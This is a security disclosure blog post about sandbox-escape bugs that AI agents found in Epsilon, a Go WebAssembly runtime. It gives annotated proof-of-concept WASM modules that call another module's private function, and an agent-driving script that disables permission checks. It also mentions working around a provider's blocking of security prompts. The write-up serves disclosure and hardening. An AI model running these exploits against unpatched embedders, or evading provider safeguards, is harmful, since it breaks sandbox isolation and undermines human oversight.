All the Bugs They Found

Security vulnerabilities found in Epsilon, a WebAssembly (WASM) runtime written in Go. AI agents discovered over 20 security flaws, including sandbox escapes that allowed malicious WASM modules to break isolation and access another module's private state. One specific vulnerability, "Zero Is Not Null," occurred because Epsilon incorrectly initialized unassigned function reference locals to zero instead of null, enabling attackers to call private functions by exploiting the runtime's representation of funcrefs as integer indices.

Last year I wrote a small WASM runtime in Go, Epsilon (https://github.com/ziggy42/epsilon). As far as runtimes go, this is a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code. It is also very extensively tested against the official WASM testsuite (https://github.com/WebAssembly/testsuite). Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code.

How many security vulnerabilities do you think AI agents found in it?

More than 20.

Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere. A handful, though, were properly interesting: sandbox escapes that let a malicious WASM module (https://developer.mozilla.org/en-US/docs/WebAssembly/Guides/Concepts#webassembly_key_concepts) break out of its isolation and reach into another module's private state. These are my favorites.

Background

A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported and imported objects. Unexported functions, memories, etc., are private to the module that defined them.

WASM is a typed stack machine, but the type checking does not happen at runtime: before execution, a validator walks the bytecode and verifies that at any point the values on the stack have the expected type. For example, a module that tried to local.set an i32 into a funcref local would be rejected before it ever started running. Epsilon then executes blindly, trusting the validator's earlier checks.
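To make the validator's role concrete, here is a minimal sketch of that kind of pre-execution check. It is a toy, not Epsilon's validator: the `valType`, `instr`, and `validate` names are hypothetical, and only two instructions are modeled. It tracks types (never values) on an abstract stack and rejects a `local.set` whose operand type does not match the local's declared type.

```go
package main

import (
	"errors"
	"fmt"
)

// valType is a toy stand-in for WASM value types (hypothetical, not Epsilon's).
type valType int

const (
	i32 valType = iota
	funcref
)

// instr is a toy instruction: either push a constant of some type,
// or local.set into a local identified by index.
type instr struct {
	op    string  // "const" or "local.set"
	typ   valType // type pushed by "const"
	local int     // target local for "local.set"
}

// validate walks the code once, tracking only the types on the operand
// stack, and rejects any local.set whose operand type does not match.
func validate(locals []valType, code []instr) error {
	var stack []valType
	for _, in := range code {
		switch in.op {
		case "const":
			stack = append(stack, in.typ)
		case "local.set":
			if len(stack) == 0 {
				return errors.New("stack underflow")
			}
			if in.local < 0 || in.local >= len(locals) {
				return errors.New("unknown local")
			}
			top := stack[len(stack)-1]
			stack = stack[:len(stack)-1]
			if top != locals[in.local] {
				return errors.New("type mismatch")
			}
		default:
			return errors.New("unknown instruction")
		}
	}
	return nil
}

func main() {
	locals := []valType{funcref}
	// An i32 constant followed by local.set into a funcref local.
	bad := []instr{{op: "const", typ: i32}, {op: "local.set", local: 0}}
	fmt.Println(validate(locals, bad)) // rejected before anything runs
}
```

Once a check like this has passed, an interpreter can skip type tags at runtime, which is exactly why any disagreement between validator and VM becomes dangerous.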
Thanks to the type guarantees provided by the validator, a funcref at runtime in Epsilon is represented as an int32: -1 is the null sentinel, and any non-negative value is an index into the global function store, shared across all modules instantiated in the runtime. As a result, the constant 0 and a funcref pointing to the first function in the store are indistinguishable during execution. This simplifies the implementation and improves performance, at the cost of delegating safety entirely to the validator.

Each attacker module in the following sections runs alongside the same victim module:

    (module
      (func $secret (result i32)  ;; declares a function $secret: takes no parameters,
                                  ;; returns a 32-bit integer. Private, never exported
        i32.const 1337))          ;; pushes 1337 onto the stack; becomes the return value

Since $secret is the first function instantiated into the runtime, it lives at store index 0. The goal of each attacker module is to get the VM to call it, returning 1337, despite never being given a legitimate funcref to it.

1. Zero Is Not Null

The simplest of the three. Here's the attacker:

    (module
      (type $t (func (result i32)))  ;; the call_indirect type signature
      (table 1 funcref)              ;; a table of size 1 (essentially an array of funcrefs).
                                     ;; Identified by its module-level index, which is 0
                                     ;; here since it's the first and only table declared
      (func (export "exploit") (result i32)
        (local $f funcref)           ;; declared, never assigned;
                                     ;; per spec, ref locals default to null
        i32.const 0                  ;; the slot in the table where we'll write
                                     ;; stack: [0]
        local.get $f                 ;; push $f's value (null)
                                     ;; stack: [0, null]
        table.set 0                  ;; immediate 0 picks which table to write to
                                     ;; (tables[0]); pops two values from the stack:
                                     ;; first the funcref (null), then the slot index.
                                     ;; Writes tables[0][0] = null
                                     ;; stack: []
        i32.const 0                  ;; the slot in the table to fetch from next
                                     ;; stack: [0]
        call_indirect (type $t)))    ;; pop the slot, fetch tables[0][slot] (null),
                                     ;; and call it

The exploit function, while perfectly valid WASM, should trap at runtime. The local $f is uninitialized, therefore null. call_indirect should fail.

Except that in Epsilon, it didn't. It called $secret instead.

The culprit was how locals were initialized. When a function is called, the spec requires locals to be initialized to their default values: zero for numeric and vector types, but null for reference types. Epsilon achieved this by zeroing all non-parameter locals using Go's clear:

    // Clear non-parameter locals to their zero values.
    clear(locals[numParams:])

This was idiomatic and fast, but Go's clear simply set the local to 0. Per our funcref representation, that's not null (-1): it's the store index of $secret. When exploit was called, rather than trapping on a null call_indirect, the VM called the function at store index 0.

2. Phantom Block Parameter

This one combines two separate bugs:

    (module
      (type $t (func (result i32)))
      (table 1 funcref)
      (func (export "exploit") (result i32)
        (local $f funcref)
        ref.null func          ;; push a null funcref onto the stack
        i32.const 0
        (block (param i32)     ;; block consumes the i32 from the stack...
          drop)                ;; ...and immediately drops it
        local.set $f           ;; store top of stack into $f (the null funcref)
        local.get $f
        ref.is_null            ;; is $f null?
        if (result i32)
          i32.const 42         ;; expected path: $f was null, return 42
        else                   ;; unreachable path: $f is always null
          i32.const 0
          local.get $f
          table.set 0
          i32.const 0
          call_indirect (type $t)
        end))

In any correct WASM implementation (and indeed in the latest version of Epsilon), exploit returns 42, as expected. It returned 1337 instead.

Stack Height Misalignment

During their execution, control-flow blocks (block, loop, if) may consume inputs from the stack and produce results on it.
At the end of execution the stack must look exactly as the block's signature describes: N params consumed, N results pushed in their place. Anything the body left in between has to be discarded, so the runtime needs to know how high the stack was when entering the block. In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack:

    vm.pushControlFrame(frame, controlFrame{
        stackHeight: vm.stack.size(), // height at block entry
        // ...
    })

But here lies the first bug: that line captures the stack height after the block's parameters are already pushed. In WASM, parameters are consumed by the block: they belong to the block, not to the surrounding scope. So the validator and the VM now disagree by exactly N parameters about where "the bottom of the block" is on the stack.

Memory Resurrection

When a block ends, the VM calls unwind to restore the stack to its declared, pre-block height. targetHeight is the stack height recorded in the controlFrame structure.

    func (s *valueStack) unwind(targetHeight, preserveCount uint32) {
        valuesToPreserve := s.data[s.size()-preserveCount:]
        s.data = s.data[:targetHeight]
        s.data = append(s.data, valuesToPreserve...)
    }

Because of the stack height misalignment bug above, targetHeight is too high: it counts the block's parameters as if they were still on the stack. Therefore s.data[:targetHeight] causes the slice to grow back rather than be truncated. As long as targetHeight <= cap(s.data), Go is happy to re-expose whatever was sitting in the backing array. Parameters that the validator considered consumed are now resurrected on top of the stack.
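The slice behavior behind this is easy to reproduce in isolation. The sketch below is not Epsilon code: `regrow` is a hypothetical helper that mimics the shape of the bug on a plain `[]int32`, using 7 as the parameter value so the resurrected element is easy to tell apart from a zeroed backing array.

```go
package main

import "fmt"

// regrow mimics the shape of the unwind bug on a plain []int32:
// push two values, pop one, then reslice to a stale height.
func regrow() []int32 {
	stack := make([]int32, 0, 8)
	stack = append(stack, -1) // stands in for the null funcref
	stack = append(stack, 7)  // stands in for the i32 block parameter
	staleHeight := len(stack) // recorded after the parameter was pushed: 2

	// "drop": len shrinks to 1, but the 7 is still in the backing array.
	stack = stack[:len(stack)-1]

	// staleHeight (2) is greater than len (1) but within cap (8), so this
	// reslice grows the slice and re-exposes the dropped element.
	return stack[:staleHeight]
}

func main() {
	fmt.Println(regrow()) // [-1 7]
}
```

A slice expression `s[:n]` only panics when `n` exceeds `cap(s)`, not `len(s)`, so a truncation helper that wants to be safe has to compare against `len` itself.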
Bugs Collide

Let's walk through the exploit function with both bugs in mind:

    (func (export "exploit") (result i32)
      (local $f funcref)
      ref.null func          ;; stack: [null funcref]
      i32.const 0            ;; 0 is the index where $secret happens to sit in the
                             ;; global function store, since it was the very first
                             ;; function instantiated
                             ;; stack: [null funcref, 0]
      (block (param i32)     ;; bug 1: VM records stackHeight = 2; the validator,
                             ;; treating the i32 as consumed (per spec), records 1
        drop)                ;; pops and discards the top of the stack (the 0)
                             ;; stack: [null funcref]
                             ;; bug 2: end calls unwind, which sets s.data to
                             ;; s.data[:2], so len 1 grows back to 2, and the 0 we
                             ;; dropped resurrects on top. The top is now an int32
                             ;; of value 0, but the validator still thinks it's a
                             ;; funcref
                             ;; stack: [null funcref, 0]
      local.set $f           ;; 0 is put in $f, which should be a funcref. Since
                             ;; Epsilon's internal representation of funcref is also
                             ;; an int32, this works at runtime
      local.get $f           ;; stack: [null funcref, 0]
      ref.is_null            ;; null is -1, so 0 isn't null; pops the funcref and
                             ;; pushes 0 (false). The top of the stack visually
                             ;; still looks like 0, but its type changed from
                             ;; funcref to i32
                             ;; stack: [null funcref, 0 (i32 false)]
      if (result i32)        ;; pops the i32 condition (0, false), so the else
                             ;; branch fires
                             ;; stack: [null funcref]
        i32.const 42         ;; not taken
      else
        i32.const 0          ;; the slot index for the upcoming table.set
                             ;; stack: [null funcref, 0]
        local.get $f         ;; the funcref value to store (actually the int32 0)
                             ;; stack: [null funcref, 0, 0]
        table.set 0          ;; pops the funcref then the slot index; both are 0,
                             ;; so tables[0][0] now holds the integer 0 dressed as
                             ;; a funcref
                             ;; stack: [null funcref]
        i32.const 0          ;; the slot index within the table to look up
                             ;; stack: [null funcref, 0]
        call_indirect (type $t)
                             ;; pops the slot index, fetches tables[0][0] (our
                             ;; int 0 dressed as a funcref), which points at
                             ;; store[0] = $secret. Call it.
      end)

A perfectly valid WASM module just called an unexported function from another module.
By choosing a different integer, it could reach any private function in Epsilon's global store.

3. Ghost in the Stack

The first two exploits relied on the validator and VM disagreeing about values on the stack inside the sandbox. This one shifts category: the disagreement is between a host function's declared signature and what it actually returns at runtime.

    (module
      (type $t (func (result i32)))
      (import "env" "leak" (func $leak (result funcref)))
                             ;; the host must provide env.leak
      (table 1 funcref)
      (func (export "exploit") (result i32)
        i32.const 0          ;; table index
        i32.const 0          ;; index of $secret in the global function store
        call $leak           ;; declared to return a funcref; the validator thinks
                             ;; the stack gains one new value after this call
        table.set 0          ;; store the "result" (actually our 0) into the table
        i32.const 0
        call_indirect (type $t)
        return))

For this exploit to land, the host needs to provide a function env.leak whose runtime behavior diverges from its signature: one that returns fewer results than promised. In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature:

    res := fun.hostCode(fun.module, args...)
    vm.stack.pushAll(res)

If leak returned an empty slice instead of the promised funcref, pushAll did nothing. The validator believed a funcref had been pushed. Instead, the stack was unchanged. The two 0s pushed before $leak were still on the stack. The VM ran table.set 0 and popped them: one as the funcref, one as the slot index. tables[0][0] now held the integer 0. call_indirect fetched it and happily called the function at index 0, $secret.
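The missing guard can be sketched as follows. This is an illustration under assumptions, not Epsilon's actual fix: `hostFunc`, `callHost`, and `errResultArity` are hypothetical names, and the stack is modeled as a plain `[]any`. The idea is only that the result count is compared with the declared signature before anything is pushed.

```go
package main

import (
	"errors"
	"fmt"
)

// hostFunc is a hypothetical stand-in for a host function together with
// the number of results its declared signature promises.
type hostFunc struct {
	numResults int
	code       func(args ...any) []any
}

var errResultArity = errors.New("host function returned wrong number of results")

// callHost invokes the host function and leaves the stack untouched
// unless the result count matches the declared signature.
func callHost(stack []any, f hostFunc, args ...any) ([]any, error) {
	res := f.code(args...)
	if len(res) != f.numResults {
		return stack, errResultArity // a real VM would trap here
	}
	return append(stack, res...), nil
}

func main() {
	// leak promises one result but returns none.
	leak := hostFunc{numResults: 1, code: func(args ...any) []any { return nil }}
	_, err := callHost([]any{int32(0), int32(0)}, leak)
	fmt.Println(err)
}
```

A fuller version would presumably also check each returned value's type against the signature, since a host that returns the right number of wrongly typed values would reopen the same hole.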
Methodology

I used a combination of approaches to find these bugs, starting with a script similar to the one described in the Black-hat LLMs (https://youtu.be/1sd26pWhfmg?t=307) talk:

    #!/bin/bash

    # Directory to store vulnerability reports
    VULN_DIR="vulnerabilities"
    mkdir -p "$VULN_DIR"

    # List of areas to investigate
    AREAS=(
        "epsilon/parser.go"
        "epsilon/validation.go"
        "epsilon/vm.go"
        "epsilon/memory.go"
        "epsilon/imports.go"
        "wasip1/wasi_resources.go"
        "wasip1/wasi_poll.go"
        "wasip1/wasi_unix.go"
    )

    PROMPT_TEMPLATE="You are an expert security researcher and exploit developer.

    STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN_DIR/' directory.
    Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes
    in '$VULN_DIR/' only.

    Your task is to objectively investigate the following file for security
    vulnerabilities: %s

    Explore the file and any related files, data structures, or interactions it
    depends on. Where relevant, check behavior against the WebAssembly 2.0
    specification (https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf)
    and the WASI Preview 1 specification; a deviation from spec in
    security-sensitive code is itself a vulnerability. Do not flag missing
    features from specs beyond WebAssembly 2.0.

    Do not assume a vulnerability exists. If after thorough investigation you find
    nothing exploitable, state so clearly and stop.

    If you confirm a vulnerability:
    1. Create a dedicated directory: '$VULN_DIR/<vulnerability_name>/'
    2. Write 'README.md' with: root cause, impact, and reproduction steps
    3. Write a PoC exploit: a concrete, runnable demonstration (Go test, .wasm
       file, or script) that proves the vulnerability is triggerable by a
       malicious WebAssembly module without any special host configuration"

    # Get agent from command line, default to claude
    AGENT=${1:-claude}

    if [[ "$AGENT" == "claude" ]]; then
        AGENT_CMD="claude --dangerously-skip-permissions"
    elif [[ "$AGENT" == "gemini" ]]; then
        AGENT_CMD="gemini --yolo"
    elif [[ "$AGENT" == "vibe" ]]; then
        AGENT_CMD="vibe --trust"
    else
        echo "Usage: $0 [claude|gemini|vibe]"
        exit 1
    fi

    for AREA in "${AREAS[@]}"; do
        echo "--------------------------------------------------"
        echo "Starting investigation of area: $AREA using $AGENT"
        echo "--------------------------------------------------"

        CURRENT_PROMPT=$(printf "$PROMPT_TEMPLATE" "$AREA")
        $AGENT_CMD -p "$CURRENT_PROMPT"

        echo "Finished investigation of $AREA."
        echo "Sleeping for 10 seconds to respect rate limits..."
        sleep 10
    done

Then I moved to a skill (https://github.com/ziggy42/epsilon/blob/main/.agents/skills/security-audit/SKILL.md) instead, which is slightly more convenient. I'm honestly not sure which one is better as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise to the reader.

To work around token limits, I also used a variety of models, mainly:

- Gemini 3 Flash
- Gemini 3.1 Pro
- Opus 4.7

Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning. Trying to work around Anthropic blocking security-related prompts does get pretty tiring though.

Closing thoughts

Epsilon is a weekend hobby project, so I went in expecting agents to find something. It was still astonishing to see some of these issues. Bug 2 in particular is pretty cool.
Please update to version 0.1.0 (https://github.com/ziggy42/epsilon/blob/main/CHANGELOG.md#010---2026-05-19).